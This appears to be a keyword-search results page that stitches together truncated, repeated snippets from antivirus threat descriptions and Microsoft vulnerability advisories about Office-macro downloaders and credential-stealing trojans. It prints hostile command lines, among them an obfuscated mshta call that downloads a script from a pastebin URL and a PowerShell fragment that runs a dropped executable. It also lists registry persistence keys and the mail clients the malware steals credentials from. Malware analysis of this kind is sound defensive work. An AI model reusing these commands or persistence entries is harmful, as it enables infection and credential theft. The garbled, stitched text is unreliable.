Keyword: ms
The MS Excel file contains the following fake details luring users to enable macro content: W97M.Downloader.GET (BitDefender); Trojan-Downloader.VBA.Agent (Ikarus); Trojan.Mdropper (Norton) Dropped by
downloaded unknowingly by users when visiting malicious sites. Installation This Exploit adds the following processes: cMd /C mS^Ht^a ht^tp^s:^/^/pastebin.com/raw/KaRJhyiv %System%\WindowsPowerShell\v1.0
MS Advisory (2896666) Vulnerability in Microsoft Graphics Component Could Allow Remote Code Execution
vulnerabilities. MS Bulletin ID Vulnerability ID DPI Rule Number DPI Rule Name Release Date IDF Compatibility CVE-2013-3906 1005764 Microsoft Graphics Component Remote Code Execution Vulnerability (CVE-2013-3906)
JDownloder v2.0 Steam Attempts to get stored credential from the following: Eudora MS Outlook Google Desktop Windows Mail Windows Live Mail Incredimail Gmail Hotmail/MSN Yahoo! Mail Netscape Mail Attempts to
from the following: Eudora MS Outlook Google Desktop Windows Mail Windows Live Mail Incredimail Gmail Hotmail/MSN Yahoo! Mail Netscape Mail Attempts to get stored info such as username, password and
Firewall (IDF) plugin are also protected from attacks using these vulnerabilities. MS Bulletin ID Vulnerability ID DPI Rule Number DPI Rule Name Release Date Vulnerability Protection and IDF Compatibility
file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Installation This Trojan adds the following processes: CMD.EXE /c ms^hta http://{BLOCKED}.2^
\RC.resources.dll %Program Files%\ErrorFix KIT\es-ES\RC.resources.dll %Program Files%\ErrorFix KIT\vi\RC.resources.dll %Program Files%\ErrorFix KIT\vi\RC.resources.dll %Program Files%\ErrorFix KIT\ms\RC.resources.dll
to enable its automatic execution at every system startup: HKEY_CURRENT_USER\Software\Microsoft\ Windows\CurrentVersion\Run MS Common User Interface = "%ProgramData%\Microsofts\Windows NT\svchost.exe
\CurrentControlSet\ Services\MediaCenter DisplayName = "MS Media Control Center" HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Services\MediaCenter\Parameters ServiceDll = "%System%\Prcmxnq.src" HKEY_LOCAL_MACHINE
secured or not [Yes/ No]) It attempts to steal stored email credentials from the following: Outlook Express IncrediMail Eudora GroupMail Free MS Outlook 2002/ 2003/ 2007/ 2010 Gmail Hotmail/MSN Yahoo! Mail
Search and Download MS Office documents (doc, docx, xls, xlsx) It connects to the following URL(s) to send and receive commands from a remote malicious user: http://{BLOCKED}.{BLOCKED}.241.141/v1 http://
or C:\Users\{user name}\AppData\Local\Temp on Windows Vista and 7.) NOTES: When a machine is affected with this malware, MS Excel exits and runs again opening the non-malicious .XLS file to trick users
(64-bit).) Other System Modifications This Trojan Spy deletes the following files: %Windows%\Tasks\Ms visual extension.job (Note: %Windows% is the Windows folder, where it usually is C:\Windows on all
\svchost.exe -k krnlsrvc" HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Services\MediaCenter DisplayName = "MS Media Control Center" HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Services\MediaCenter\Parameters
'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe); NOTES: The MS Excel file contains the following fake details luring users to enable macro content: TrojanDownloader:O97M/Donoff (Microsoft);
Shell.Application).ShellExecute($env:TEMP + '\dr.exe'); Stop-Process -Id $Pid -Force; --> NOTES: The MS Excel file contains the following fake details luring users to enable macro content: